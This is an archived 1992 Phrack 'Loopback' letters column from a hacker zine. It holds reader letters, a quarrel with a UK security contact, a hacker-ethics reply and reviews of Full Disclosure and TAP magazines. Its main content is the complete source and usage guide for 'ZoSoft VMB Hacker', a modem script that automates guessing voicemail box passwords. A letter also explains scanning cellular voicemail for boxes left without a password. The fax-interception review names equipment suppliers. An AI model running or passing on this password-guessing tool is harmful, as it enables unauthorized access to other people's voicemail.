home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 1 / HACKER1.ISO / phrk3 / phrack35.2 < prev    next >
Text File  |  1992-09-26  |  29KB  |  726 lines

  1.  
  2.  
  3.                                 ==Phrack Inc.==
  4.  
  5.                 Volume Three, Issue Thirty-five, File 2 of 13
  6.  
  7.                           [-=:< Phrack Loopback >:=-]
  8.  
  9.                                 By Phrack Staff
  10.  
  11.      Phrack Loopback is a forum for you, the reader, to ask questions, air
  12. problems, and talk about what ever topic you would like to discuss.  This is
  13. also the place The Phrack Staff will make suggestions to you by reviewing
  14. various items of note; magazines, software, catalogs, hardware, etc.
  15. ______________________________________________________________________________
  16.  
  17. What's on Your Mind
  18. ~~~~~~~~~~~~~~~~~~
  19.  
  20. :: Hacking VMB's ::
  21.  
  22. From: Mr. Upsetter
  23. To: phracksub@stormking.com
  24. Subject: Phrack 34 VMB article
  25.  
  26. The article in Phrack 34 on voice mail hacking by Night Ranger was really good.
  27. It reminded me of some experiences I had with a cellular voice mail system a
  28. couple years ago in San Diego.  I would bet there are similar systems in other
  29. cities.
  30.  
  31. These VMB's would automatically answer calls when the subscriber wasn't on the
  32. air.  They worked just like standard VMB's.  To access the box, the owner could
  33. dial his or her own cellular number, then hit * when it answered.  Then the VMB
  34. would ask for a password.
  35.  
  36. Guess what the default password was?  None!  That meant all you had to do was
  37. dial up a cellular VMB and hit *, and you were in.  How many VMB's still had
  38. the default password?  About half...
  39.  
  40. To scan for cellular VMB's all you had to do was dial numbers in the cellular
  41. prefix.  It was pretty fun...almost too easy.
  42.  
  43. Cheers,
  44. Mr. Upsetter
  45.  
  46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  47.  
  48. >From: Zoso Puda
  49. >
  50. >After reading PHRACK 34 I thought it was good. Especially the article on VMB
  51. >hacking. As a matter of fact I wrote a SALT script to help me do it.
  52.  
  53.      This is exactly what we like to see.  People actually getting basic
  54. information and building on it.
  55.  
  56. -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -
  57.  
  58.                     +-------------------------------------+
  59.                     |      ZoSoft Telix VMB Hacker        |
  60.                     |                                     |
  61.                     |       written by: Zoso Puda         |
  62.                     +-------------------------------------+
  63. First words
  64. -----------
  65.    After reading Night Ranger's article (see PHRACK 34), I decided to make a
  66. VMB hacking program. Night Ranger provided good insight into how to hack VMB
  67. systems but some VMBs are hard to crack. What I came up with is a program to
  68. help me hack some of the harder systems. The ones that don't use the defaults
  69. are tough. Also my phone has the buttons and earpiece in one unit and I had to
  70. dial then put the phone to my ear and listen, look at the buttons to dial a
  71. number and put the phone back to my ear to listen. It soon became tiresome.
  72.  
  73.    What I finally came up with was a program to let me run all the phone
  74. functions from the keyboard. My modem speaker is loud enough to hear clearly so
  75. it seemed like the perfect thing to do. I also automated certain features like
  76. incrementing the password or box number. The program is not fully automated
  77. however. You must run this program manually. It's main purpose is to allow you
  78. to run normal phone functions via the keyboard. If you cannot hear clearly
  79. through your modem speaker then pick up the phone after the program dials the
  80. VMB phone # and hang up the phone before hanging up the modem.
  81.  
  82.    What follows is a brief description on how to use the program, compile the
  83. program, and run the program. A working knowledge of VMB systems is expected.
  84.  
  85. Parameter details
  86. -----------------
  87.   VMB phone number : If you don't know this, give it up.
  88.  
  89.   Setup sequence : This code is used for systems that require a '9' or '#' or
  90.                    '*' to be pressed before the box number. Up to 3 characters
  91.                    can be in this string.
  92.  
  93.   Valid Box #      : This would be a known valid box or the box you will
  94.                      be attempting to hack. This value remains constant.
  95.  
  96.   Codefile filename: You may use a file to get 'default' or your favorite
  97.                      passwords from. You must include the extension.
  98.  
  99.   Starting box/code: Box # or code to start checking. This value will
  100.                      increase automatically upon pressing [F7].
  101.  
  102. Using the function keys
  103. -----------------------
  104.                 [F1]    Dials the VMB system (see params).
  105.                 [F2]    Hangs-up the modem.
  106.                 [F3]    Closes the current codefile.(see params).
  107.                 [F4]    Lets you set the current code/box #.
  108.                 [F5]    Dials the Setup sequence (see params).
  109.                 [F6]    Dials the current code.
  110.                 [F7]    Makes the next code current.
  111.                 [F8]    Dials the valid box (see params).
  112.                 [F9]    Allows you to re-set the parameters.
  113.                 [F10]   Hangs-up and quits the program.
  114.                 [0 - 9] These keys will dial 0 - 9 respectively.
  115.                 [*, #]  These keys will dial * and #.
  116.                 [/]     Used as a substitute # for the keypad.
  117.  
  118. Basic Insructions
  119. -----------------
  120. Codefiles should be stored in the same directory as your Telix program.
  121.  
  122. A sample codefile should look like this:
  123.  
  124. 1111
  125. 2222
  126. 3333
  127. etc...
  128.  
  129. I suggest you make seperate codefiles for the number of digits in each code.
  130. For example, all 3 digit codes should be in a file called 3DIGIT.COD, or
  131. something similar.
  132.  
  133. During parameter entry, if you enter a codefile and it exists, you will NOT
  134. be prompted for a 'Starting box/code'. When the codefile is finished, the
  135. current code will set itself to 1000.
  136.  
  137. If you enter a blank for the codefile or the name you entered doesn't exist
  138. then you will be prompted for a 'Starting Box/Code'.
  139.  
  140. Compiling
  141. ---------
  142.  Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file
  143.  VMBHACK.SLT into the directory where your Telix scripts are. Compile using
  144.  CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press
  145.  Alt-G followed by the program name (VMBHACK).
  146.  
  147. //---------------------------<CUT HERE>-------------------------------------
  148. //                   ZoSoft VMB Hacker Version 1.4
  149. //                    Code by: Zoso, November 1991
  150. //
  151. //           See PHRACK 34 for more information on VMB systems.
  152. //
  153. // NOTE: Do not remove the credits of the original author, modified versions
  154. //       you may add credits, but please do not remove any.
  155. //
  156. str code[10],                           // Global Variables
  157.     codes[10],
  158.     reset[1],
  159.     vmb_number[15],
  160.     borc[1],
  161.     valid[10],
  162.     setup[3];
  163. str filename[12],
  164.     fstatus[10];
  165. int f;
  166. int fflag = 0;
  167. init_modem()                            // Modem initialization
  168. {
  169. cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on
  170. cputs("^M");                            // some modems, you may have to
  171. waitfor("OK",20);                       // alter this. See you modem
  172. manual.
  173. }
  174. vmb_dial(str string)                    // Dial function
  175. {
  176. str workstr[20];
  177. workstr = string;
  178. strcat(workstr,";");
  179. cputs("ATDT");
  180. cputs(workstr);
  181. cputs("^M");
  182. cputs("^M");
  183. }
  184. hang_up()                               // Hang Up function
  185. {
  186. hangup();
  187. waitfor("",20);
  188. cputs("ATH0");
  189. cputs("^M");
  190. cputs("^M");
  191. clear_scr();
  192. display();
  193. }
  194. next_code()                             // Next code function
  195. {
  196. int cd;
  197. if (fflag)
  198.    {
  199.     if (not feof(f))                    // Check for file first
  200.        {
  201.         fgets(code,10,f);
  202.         return;
  203.        }
  204.     if (feof(f))
  205.        {
  206.         file_close();
  207.         code = "999";
  208.         goto NEXTCODE;
  209.        }
  210.    }
  211. NEXTCODE:
  212. cd = stoi(code);
  213. cd = cd + 1;                            // This line determines how the
  214. code
  215. itos(cd,code);                          // gets incremented.
  216. }
  217. set_code()                              // Enter new code
  218. {
  219. gotoxy(65,2);
  220. gets(code,10);
  221. }
  222. parameters()                            // Set parameters
  223. {
  224. str c[1];
  225. file_close();
  226. GETINFO:
  227. clear_scr();
  228. printsc("VMB Hacker Parameters^M^J");
  229. printsc("^M^JVMB phone number    :");
  230. gets(vmb_number,15);
  231. printsc("^M^JSetup sequence      :");
  232. gets(setup,3);
  233. printsc("^M^JValid box #         :");
  234. gets(valid,10);
  235. printsc("^M^JCodefile filename   :");
  236. gets(filename,12);
  237. if (filename != "")
  238.    {
  239.     open_file();
  240.     next_code();
  241.    }
  242. if (not fflag)
  243.    {
  244.     filename = "N/A";
  245.     printsc("^M^JStarting box/code   :");
  246.     gets(code,10);
  247.    }
  248. printsc("^M^J^M^JCorrect? (Y/n):");
  249. gets(c,1);
  250. if (c == "n" || c == "N")
  251.     goto GETINFO;
  252. }
  253. press_enter()                           // Pause routine
  254. {
  255. str a[1];
  256. pstraxy("Press [ENTER] to continue...",20,23,11);
  257. gets(a,1);
  258. }
  259. title_scr()                             // Title screen
  260. {
  261. str i[1];
  262. TITLE:
  263. clear_scr();
  264. pstraxy("  - ZoSoft VMB Hacker V1.4 -",20,4,11);
  265. pstraxy("written for Telix by: Zoso Puda",20,6,14);
  266. press_enter();
  267. }
  268. display()                               // Display screen
  269. {
  270. box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19);
  271. pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31);
  272. pstraxy("VMB Number:",4,2,31);          // Information display
  273. pstraxy(vmb_number,16,2,27);
  274. pstraxy("Valid #:",33,2,31);
  275. pstraxy(valid,42,2,27);
  276. pstraxy("Current:",57,2,31);
  277. pstraxy(code,66,2,27);
  278. pstraxy("Codefile:",6,4,31);
  279. pstraxy(filename,16,4,27);
  280. pstraxy("File status:",29,4,31);
  281. pstraxy(fstatus,42,4,27);
  282. pstraxy("Setup sequence:",50,4,31);
  283. pstraxy(setup,66,4,27);
  284. box(0,6,78,10,4,0,103);                 // Function key display
  285. pstraxy("[           ]",30,6,111);
  286. pstraxy(" 0 - 9,*,#",31,6,110);
  287. pstraxy("[  ] Dial VMB", 2,7,111);
  288. pstraxy("F1", 3,7,110);
  289. pstraxy("[  ] Hang up",22,7,111);
  290. pstraxy("F2",23,7,110);
  291. pstraxy("[  ] Close file",42,7,111);
  292. pstraxy("F3",43,7,110);
  293. pstraxy("[  ] Set Current",61,7,111);
  294. pstraxy("F4",62,7,110);
  295. pstraxy("[  ] Setup seq.",2,8,111);
  296. pstraxy("F5", 3,8,110);
  297. pstraxy("[  ] Dial current",22,8,111);
  298. pstraxy("F6",23,8,110);
  299. pstraxy("[  ] Next box/code",42,8,111);
  300. pstraxy("F7",43,8,110);
  301. pstraxy("[  ] Valid box",61,8,111);
  302. pstraxy("F8",62,8,110);
  303. pstraxy("[  ] Parameters",22,9,111);
  304. pstraxy("F9",23,9,110);
  305. pstraxy("[   ] QUIT",41,9,111);
  306. pstraxy("F10",42,9,110);
  307. gotoxy(0,11);
  308. }
  309. quit_vmb()                              // End program
  310. {
  311. file_close();
  312. hangup();
  313. waitfor("",20);
  314. clear_scr();
  315. printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J");
  316. cputs_tr(_mdm_init_str);                // Restore modem params
  317. }
  318. open_file()                             // Open Codefile
  319. {
  320. fflag = 1;
  321. f = fopen(filename,"r");
  322. fstatus = "OPEN";
  323. if (ferror(f))
  324.     file_close();
  325. }
  326. file_close()                            // Close Codefile
  327. {
  328. fflag = 0;
  329. fclose(f);
  330. fstatus = "CLOSED";
  331. }
  332. main()                                  // MAIN program module
  333. {
  334. int chr;
  335. title_scr();
  336. parameters();
  337. clear_scr();
  338. display();
  339. init_modem();
  340. TOP:
  341. gotoxy(0,11);
  342. chr = inkeyw();
  343. if (chr == '0')    vmb_dial("0");       // Dial 0-9
  344. if (chr == '1')    vmb_dial("1");
  345. if (chr == '2')    vmb_dial("2");
  346. if (chr == '3')    vmb_dial("3");
  347. if (chr == '4')    vmb_dial("4");
  348. if (chr == '5')    vmb_dial("5");
  349. if (chr == '6')    vmb_dial("6");
  350. if (chr == '7')    vmb_dial("7");
  351. if (chr == '8')    vmb_dial("8");
  352. if (chr == '9')    vmb_dial("9");
  353. if (chr == '#')    vmb_dial("#");       // Pound sign (#)
  354. if (chr == '/')    vmb_dial("#");       // Make (/) same as (#) for keypad
  355. if (chr == '*')    vmb_dial("*");       // Asterisk (*)
  356. if (chr == 15104)                       // F1
  357.     vmb_dial(vmb_number);
  358. if (chr == 15360)                       // F2
  359.     hang_up();
  360. if (chr == 15616)                       // F3
  361.    {
  362.     file_close();
  363.     display();
  364.    }
  365. if (chr == 15872)                       // F4
  366.    {
  367.     set_code();
  368.     display();
  369.    }
  370. if (chr == 16128)                       // F5
  371.     vmb_dial(setup);
  372. if (chr == 16384)                       // F6
  373.     vmb_dial(code);
  374. if (chr == 16640)                       // F7
  375.    {
  376.     next_code();
  377.     display();
  378.    }
  379. if (chr == 16896)                       // F8
  380.     vmb_dial(valid);
  381. if (chr == 17152)                       // F9
  382.    {
  383.     hang_up();
  384.     parameters();
  385.     display();
  386.    }
  387. if (chr == 17408)                       // F10
  388.    {
  389.     quit_vmb();
  390.     goto END;
  391.    }
  392. goto TOP;
  393. END:
  394. prints("^M^J");
  395. }
  396. //---------------------------<CUT HERE>---------------------
  397.  
  398. ______________________________________________________________________________
  399.  
  400. :: More Legal Stuff ::
  401.  
  402. >From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
  403. >Subject: RE: Who/What is this?
  404. >
  405. >In this country, the receipt of documents like this would probably be
  406. >pretty helpful in sending a person down on a conspiracy to contravene
  407. >a section or more of the Computer Misuse Act, I do not appreciate crap
  408. >like this appearing on my machine but since you didn't send it me, I
  409. >can't really moan at you - What I would appreciate though is if you
  410. >told people that forwarding it to people who don't want it is probably
  411. >not a good idea, unless you want all your list members locked up in
  412. >some pokey British gaol that is!
  413. >
  414. >Michael Lawrie.
  415. >---
  416. >Michael Lawrie, Hicom Group Security           <security@uk.ac.lut.hicom>
  417.  
  418. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  419.  
  420. Sir,
  421.      You will have to excuse my ignorance of telecom laws in other countries.
  422. In the United States, distribution of technical information such as Phrack Inc.
  423. is protected by law.
  424.  
  425.      Hackers are not involved in conspiracies or plots.  Most hackers could
  426. care less about politics.  Hackers are interested in the progression of
  427. technology and learning about how our advanced society works.  The inefficient
  428. structure known as government is the last thing most hackers are interested in
  429. exploring.
  430.  
  431.      Phrack Inc. has no "membership."  Phrack Inc. is an electronically
  432. distributed publication.  It is like any other security oriented newsletter.
  433. Have you ever heard of "Computer Security Journal", "Computers and Security",
  434. or "Computer Crime Digest?"  These are some of the "security industry"
  435. publications that are read in the U.S.  Phrack Inc. merely has a little
  436. different flavor to it.  If you are interested in seeing any of these printed
  437. journals, I can forward their address to you.
  438.  
  439.      I am sorry if you received Phrack Inc. and didn't wish to read it.  You
  440. might wish to take the matter up with the person that forwarded it to you.  I
  441. hope it wasn't too big of an inconvenience for you to delete the mail message
  442. containing Phrack Inc.
  443.  
  444. Cheers,
  445.  
  446. Dispater
  447.  
  448. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  449.  
  450.      After a (as it turns out not so private) conversation with Torq, it seems
  451. this guy isn't even an admin anywhere.  He just likes to pretend he is.  Did my
  452. reply end this little debate?  NOT!  This person had the nerve to intercept my
  453. private mail to Torq and then proceeded to bitch about it some more.
  454.  
  455. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  456.  
  457. >From MICHAEL@hicom.loughborough.ac.uk Sat Nov  9 09:45:53 1991
  458. Date: Fri, 8 Nov 91 13:19 GMT
  459. From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
  460. To: PHRACKSUB <<@nsfnet-relay.ac.uk:PHRACKSUB@STORMKING.com>>
  461. Subject: The EFF.
  462.  
  463. I found the following message the other day, whilst routing around, I am to
  464. assume you lied to me about taking him off the list but for now we'll forget
  465. that.
  466.  
  467. > From phrack@gnu.ai.mit.edu Wed Oct 23 01:41:51 1991
  468. > Date: Wed, 23 Oct 91 01:41:47 -0400
  469. > From: phracksub@stormking.com
  470. > Message-Id: <::::::::::::::::::::::>       
  471. > To: torq@:::::::::::::::
  472. > Subject: Phrack
  473. >
  474. > This guy sounds like a total idiot. If he does kill your account or something
  475. > stupid, get a hold of the EFF.  They went to bat for someone who had their
  476. > account revoked because he/she had issues of Phrack on their directory.
  477. >
  478. > people should get a clue....
  479. >
  480. > Dispater
  481. > phracksub@stormking.com
  482.  
  483. As you say, people should get a clue. Are you assuming that 'torq' is perhaps
  484. American and as such has his rights protected by constitution? He isn't, he is
  485. British and doesn't really as such have much going for him. If I want to kill
  486. his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack'
  487. is not breaking any laws because it does not show intent, it would be breaking
  488. my machine's regulations if it came here. I would enjoy the EFF to come 'to
  489. bat' for Torq if I revoke his account for having issues of Phrack in his
  490. directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK
  491. that you know of?
  492.  
  493. Regards...
  494.   Michael.
  495.  
  496. ---
  497. Michael Lawrie, Operations Group, Systems Development and Security.
  498. Mail: michael@uk.ac.lut.hicom                     (Span:19527::60478::lorry)
  499. [What pretentious signature?]                     (Inet: lorry@mit.edu)
  500.  
  501.  
  502. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  503.  
  504. From: Dispater
  505. To: MICHAEL@hicom.loughborough.ac.uk
  506.  
  507.         I never said I would delete him from the distribution list.  I don't
  508. have to DO anything.  Who the hell are you pretending to be anyway?  You aren't
  509. the admin of MIT's gnu machine.
  510.  
  511. >I found the following message the other day, whilst routing around, I am to
  512. >assume you lied to me about taking him off the list but for now we'll forget
  513. >that.
  514.  
  515.         Really?  What the hell were you doing prowling though someone else's
  516. mail?  I assume you did it without Torq's permission.  I wonder if MIT would
  517. like to hear that some British hacker is rummaging around their machine?  Your
  518. "finding" of our private e-mail might place you in criminal violation of the
  519. Electronic Communications Privacy Act of 1986.  This is a federal law in the
  520. United States which protects the privacy of electronic communications.  Your
  521. interception of our communications has violated our privacy.  How would you
  522. like me to have a little chat with YOUR supervisor?
  523.  
  524.        Why you care about what takes place on the MIT computer which is located
  525. here in the USA?  In this country freedom of speech is a right granted to all
  526. its citizens.  The previous publisher of Phrack had to go to Federal Court to
  527. prove it and he succeeded.  Phrack Inc. is 100% legal here and there is not one
  528. damn thing you can do about it!
  529.  
  530. Dispater
  531. ______________________________________________________________________________
  532.  
  533. :: Hacker Philosophy ::
  534.  
  535. From: The Dark Lord Sarik Malthus
  536. Organization: Underground Computing Foundation
  537.  
  538.  
  539. >         I'm curious...now, don't think I am trying to judge you, or your
  540. > actions, or anything...but I am wondering how you, in your mind, justify the
  541. > actions of hackers and the kind of information provided by your magazine?
  542.  
  543.      I don't.  I think people spend too much time attempting to justify
  544. their "morality."  I don't play that guilt trip.  I only seek information.
  545. Information has no morality.  It is simple and pure, just like truth.
  546.  
  547.      I do feel that with knowledge comes responsibility not to use it in a
  548. destructive way.  This is why I will not print "how to make bomb" files in
  549. Phrack Inc.  Explosives are made for one thing and it doesn't involve too
  550. much creativity.  People can get that type of stuff elsewhere.
  551.  
  552.      I have never damaged any system or hurt any individual financially.
  553. Carding is unquestionable robbery.  If you know the person you are carding
  554. from, that is revenge and is a different category, as far as I am concerned,
  555. but it still doesn't make it right.  Besides, any poser with half a brain can
  556. pull a CBI.  That doesn't demonstrate much talent to me.  I admit I went
  557. through the c0deZ phase, but I moved onto better things.
  558.  
  559.      I guess your basic question may boil down to, "Why hack?"  I see the
  560. internet and the telecom world in as the latest frontier to be explored.  If
  561. you look back at how this country started, you will see that it was explored
  562. by people who probably had a similar mentality to that of hackers.  We want
  563. to test ourselves.  We want to have a broad range of different experiences in
  564. our lives.  We are not content with ignorance of the unknown.  And, to some
  565. extent we are sick of our current society's norms.  With that in mind we
  566. leave the security of what is considered acceptable at times.
  567.  
  568.      I guess I have a lot of different unpopular views....oh well.
  569. _______________________________________________________________________________
  570.  
  571. A Review of:
  572. ~~~~~~~~~~
  573. Full Disclosure #23 - a publication For Truth, Justice, and The American Way
  574. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  575. Full Disclosure                              Subscription Rates:
  576. P.O. Box 903-FD23                            U.S - 12 issues for $18.00
  577. Libertyville  IL  60048                            24 issues for $29.95
  578.                                              No Canadian orders, please!
  579. by:Twisted Pair
  580.  
  581.  
  582.      About a month ago I mailed in a coupon I got from friend in order to get a
  583. sample issue of Full Disclosure.  Within a week I received Issue #23.  It's got
  584. articles on fax interception, dumpster diving, computer security tips,
  585. surveillance tips, technical stuff, mail surveillance, etc.
  586.  
  587.      The Fax Interception article was most interesting to me.  I've often
  588. wondered just how easy it could be to intercept faxes.  Its all explained in
  589. the article.  Here's some text from the article:
  590.  
  591. |                       False Sense of Security:
  592. |
  593. |   With the widespread proliferation of fax machines came increased use.
  594. |   In general, a document transferred has been given the same sort of
  595. |   validity as one sent or received by the U.S. Mail.*  In general, such
  596. |   communications were originally secure.  Now that interception equipment is
  597. |   available, the
  598. |   sense of security has become false.
  599.  
  600. *Note:  Just this month, the FCC has stopped accepting paperwork with faxed
  601.         signatures on them.  Their new policy states that they only accept
  602.         original signatures.
  603.  
  604.      How could the average Phrack reader start intercepting faxes?  Use a
  605. standard fax machine hooked up to someone's line?  Naaah.  Wouldn't work.  The
  606. handshaking routine between the two corresponding fax machines would be screwed
  607. all to hell if you threw a third machine into the mix.  Full Disclosure claims
  608. to have successfully nabbed faxes with another method.  They've pointed out
  609. this assertion with a photo on their front page of a "fax".  It was supposedly
  610. intercepted from the FBI.  It shows a computer screen with an FBI "FAX" on it.
  611. It looks more like the photo was made with some cutting and pasting at the
  612. neighborhood PIP store.  Maybe they should have added the caption "Simulated
  613. Picture" to their front page.
  614.  
  615.      They recommend using IBM PC fax boards to intercept faxes.  You'd need
  616. "sophisticated" software that would ignore the handshaking sequences between
  617. the two fax machines you're spying on.  The IBM would just save all the page
  618. information and ignore the protocol information transmitted.
  619.  
  620. Back to the article....
  621.  
  622. |   Cellular phone-based fax machines provide ripe opportunity for "hacker"
  623. |   intercepts, since the signal is available via low cost police scanners.*
  624. |   No physical connection to a common carrier network is necessary.  There is
  625. |   absolutely no risk of being detected.
  626.  
  627. *Note:  That should read MODIFIED police scanners.  See any of the ads in
  628.         "Nuts & Volts" for a book on doing this.
  629.  
  630.      Discussed in the article is something called Broadband Interception.
  631. Commercial fax interception equipment can be hooked up to monitor satellite
  632. link traffic.  One unit can decode up to 150 simultaneous fax transmissions
  633. from a 6,000 phone line satellite link.
  634.  
  635.      Next, all the consequences of forged faxes are discussed.  People have
  636. become so reliant on fax technology that they incorrectly assume that anything
  637. that "comes over the fax" must be legitimate.  Forgers find faxing much simpler
  638. than trying to make a "real" document.  The trouble of altering postmarks and
  639. signatures is bypassed.  All they need now is scissors and tape to make any
  640. "legitimate-looking" document needed.  In their next issue, they further
  641. discuss fax interception and all the implications of sending sensitive info by
  642. fax.
  643.  
  644. |                         Fax Intercept Suppliers
  645. |          (The sale and/or use of fax interception equipment may be
  646. |                  restricted by State and Federal law)
  647. |
  648. |   Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444;
  649. |   Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316;
  650. |   El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673;
  651. |   [Many others listed]
  652.  
  653. Oh, here's an ad from Full Disclosure.  It's a business card run:
  654.      ______________________________________________________
  655. |   |                                                      |
  656. |   | Unix Systems Specialists     Available July 10, 1992 |
  657. |   |                                                      |
  658. |   |               L  E  N       R  O  S  E               |
  659. |   |                                                      |
  660. |   |                  Convicted "Hacker"                  |
  661. |   |                         and                          |
  662. |   |                 Computer  Consultant                 |
  663. |   |              799 Royal St. Geore  #105               |
  664. |   |         Naperville, IL 60563  (708) 527-1293         |
  665. |   |______________________________________________________|
  666.  
  667.      Since you might want to check out a copy of Full Disclosure for yourself,
  668. I'll include their address and stuff.  The issue I had was 16 pages long,
  669. half-newspaper size.
  670. ______________________________________________________________________________
  671.  
  672.  
  673. A Review of TAP #105
  674. ~~~~~~~~~~~~~~~~~~~
  675. TAP Magazine                                       Subscription Rates:
  676. PO Box 20264                                       10 issues for $10.00
  677. Louisville KY  40250-0264
  678.  
  679. by Dispater
  680.  
  681.      Around March of 1991 I mailed in my $10. for a subscription to TAP
  682. Magazine.  Promoted as "the oldest hacker magazine" and "created by Abbie
  683. Hoffman."  I still, to this day, have not received ONE issue for my money.
  684.  
  685.      While attending CyberView '91, I met Predat0r and gave him $5.00 for a few
  686. back issues consisting of #97, #100 through issue #104.  I was later given a
  687. complimentary issue of #105.  After asking about #98 & #99, Predat0r said that
  688. he wasn't going to give those out because of some bullshit with Aristotle.
  689. Whatever...I still don't see why we couldn't see it.
  690.  
  691.      Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular,
  692. but it wasn't bad either.  The issue was 18 pages long.  For those of you who
  693. have never seen it, TAP contains information on hacking and phreaking as well
  694. as some political commentary.  The articles are always diverse and interesting.
  695.  
  696.      TAP #105 contained information about the DNA Box.  This is basically
  697. cellular phone phreaking.  It was very good and quite detailed.  There were
  698. also schematics of bugs and a flow chart explaining the incident initiation
  699. sequence of the E-911 system.  This issue of TAP was sprinkled with some neat
  700. advertisements and news clippings (as usual) and wrapped up with a file about
  701. Blue Boxing.  The price of $10.00 for 10 issues is worth it, but read on...
  702.  
  703.      Last week I asked Predat0r what was going on with TAP magazine.  He told
  704. me that he had the material for the next three issues, but his copier or some
  705. other equipment was broken.  This is an excuse I have heard before.  Whether it
  706. is a valid excuse or not, only he knows.  Since issue #105 (June) there has
  707. been not one issue of TAP.  If you have ordered a subscription prior to July
  708. and not received anything, I highly suggest you write to Predat0r.
  709.  
  710.      The material contained in TAP is good and very much worth the price.
  711. (Especially compared to 2600 Magazine) However, I find that the general
  712. management of TAP to be poor, at this time, and therefore I highly recommend
  713. that you NOT send your $10 to TAP Magazine.  Considering the amount of
  714. advertisements that we have all seen by TAP (in magazines such as Mondo 2000,
  715. 2600, etc.) in the past year, there is no excuse for the non-existent service
  716. that has transpired.  Predat0r is a good sysop and needs to manage TAP as he
  717. does his BBS.  I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP:
  718. COLUMBIAN COKE.
  719.  
  720.      I really don't like to be so critical, but I know some people I've talked
  721. to are feeling ripped off.  This is why I wrote this.  I truly hope that TAP
  722. can get out of this slump.
  723. _______________________________________________________________________________
  724.  
  725. Downloaded From P-80 International Information Systems 304-744-2253 12yrs+
  726.